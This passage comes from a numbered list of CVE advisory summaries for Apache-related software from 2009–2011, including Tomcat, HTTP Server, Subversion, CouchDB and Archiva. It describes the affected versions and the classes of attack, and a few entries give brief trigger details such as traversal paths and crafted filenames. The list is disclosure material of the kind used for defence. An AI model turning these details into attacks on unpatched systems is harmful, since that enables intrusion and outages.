10433| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
10434| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
10435| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
10436| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
10437| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
10438| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
10439| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
10440| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
10441| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
10442| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
10443| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
10444| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
10445| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
10446| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
10447| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
10448| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10449| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
10450| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
10451| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
10452| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
10453| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
10454| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
10455| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
10456| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
10457| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
10458| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
10459| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
10460| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
10461| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
10462| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
10463| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
10464| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10465| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
10466| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
10467| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
10468| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
10469| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
10470| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
10471| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
10472| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
10473| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
10474| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
10475| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
10476| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
10477| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
10478| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
10479| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
10480| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
10481| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
10482| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
10483| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
10484| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
10485| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
10486| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
10487| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
10488| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
10489| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
10490| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
10491| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
10492| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
10493| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
10494| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
10495| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
10496| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
10497| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
10498| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
10499| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
10500| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
10501| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
10502| [CVE-2009-3923] The VirtualBox 2.0.8 and 2.0.10 web service in Sun Virtual Desktop Infrastructure (VDI) 3.0 does not require authentication, which allows remote attackers to obtain unspecified access via vectors involving requests to an Apache HTTP Server.
10503| [CVE-2009-3890] Unrestricted file upload vulnerability in the wp_check_filetype function in wp-includes/functions.php in WordPress before 2.8.6, when a certain configuration of the mod_mime module in the Apache HTTP Server is enabled, allows remote authenticated users to execute arbitrary code by posting an attachment with a multiple-extension filename, and then accessing this attachment via a direct request to a wp-content/uploads/ pathname, as demonstrated by a .php.jpg filename.
10504| [CVE-2009-3843] HP Operations Manager 8.10 on Windows contains a "hidden account" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.
10505| [CVE-2009-3821] Cross-site scripting (XSS) vulnerability in the Apache Solr Search (solr) extension 1.0.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
10506| [CVE-2009-3555] The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.
10507| [CVE-2009-3548] The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.
10508| [CVE-2009-3250] The saveForwardAttachments procedure in the Compose Mail functionality in vtiger CRM 5.0.4 allows remote authenticated users to execute arbitrary code by composing an e-mail message with an attachment filename ending in (1) .php in installations based on certain Apache HTTP Server configurations, (2) .php. on Windows, or (3) .php/ on Linux, and then making a direct request to a certain pathname under storage/.
10509| [CVE-2009-3095] The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.
10510| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
10511| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
10512| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
10513| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
10514| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
10515| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
10516| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
10517| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
10518| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
10519| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
10520| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
10521| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
10522| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
10523| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
10524| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
10525| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
10526| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
10527| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
10528| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
10529| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
10530| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
10531| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
10532| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
10533| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
10534| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
10535| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
10536| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
10537| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
10538| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
10539| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
